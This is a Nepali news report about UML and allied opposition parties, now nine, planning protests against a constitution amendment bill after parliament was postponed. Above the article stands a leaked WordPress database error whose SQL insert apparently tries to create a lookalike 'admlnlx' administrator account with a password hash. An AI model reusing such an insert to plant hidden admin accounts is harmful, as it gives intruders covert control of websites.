WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.pEOqGAnwjk3sR5klCvvbGKS9Mp981', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 11:33:30', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ७-
सरकार संसद बैठक लम्ब्याएर विपक्षी सांसदलाई थकाउने रणनीतिमा लागिरहेका बेला एमालेसहितको विपक्षी मोर्चा भने आफूलाई अझ सशक्त बनाउँने रणनीतिमा लागेको छ ।
संविधान संशोधन प्रस्तावको विरोध गर्दै निरन्तर व्यवस्थापिका संसद अवरुद्ध गर्दै आएका विपक्षी आठ दललाई थकाउन सभामुख ओनसरी घर्तीमगरले बिहीबार निर्धारित संसद बैठक चार दिन पछाडि धकेले लगत्तै ती दलको बैठक बसेको छ ।
एमालेसँगै नेकपा (माले), राष्ट्रिय जनमोर्चा, नेमकिपालगायतका आठ दलले पटक–पटक सरकारलाई संशोधन प्रस्ताव अल्पमतमा परेको भन्दै फिर्ता लिन आग्रह गरे पनि सरकारले पेलेरै अघि बढ्ने धम्की दिएपछि विपक्षी मोर्चा थप बलियो बनाउँने रणनीतिमा लागेको हो ।
बिहीबारको बैठकमा दलित जनजाति पार्टीका विश्वेन्द्र पासवान पनि समावेश भएपछि अब विपक्षी मोर्चामा आवद्ध दलको संख्या नौ पुगेको छ । ‘आठ दल मात्रै हुँदा पनि एक तिहाई भन्दा बढी हाम्रो पक्षमा थियो,’ बैठकमा सहभागी एमालेका एक नेताले भने, ‘आजबाट एक दल थपिएपछि हामी झन् बलियो भएका छौँ ।’
आजको बैठकले संविधान संशोधन विधेयकविरुद्ध थप आन्दोलनको घोषणा गर्ने निर्णय गरेको एमाले सचेतक भानुभक्त ढकालले जानकारी दिए ।
एमाले संसदीय दलका उपनेता सुवास नेम्वाङको अध्यक्षतामा बिहीबार बसेको बैठकले १७ गते राजधानीमा गर्ने भनेको विशेष सभा २२ गतेलाई सारेको छ । बैठकले दबावमुलक आन्दोलनका थप कार्यक्रम घोषणा गर्न आइतबार संयुक्त पत्रकार सम्मेलन गर्ने समेत निर्णय गरेको छ ।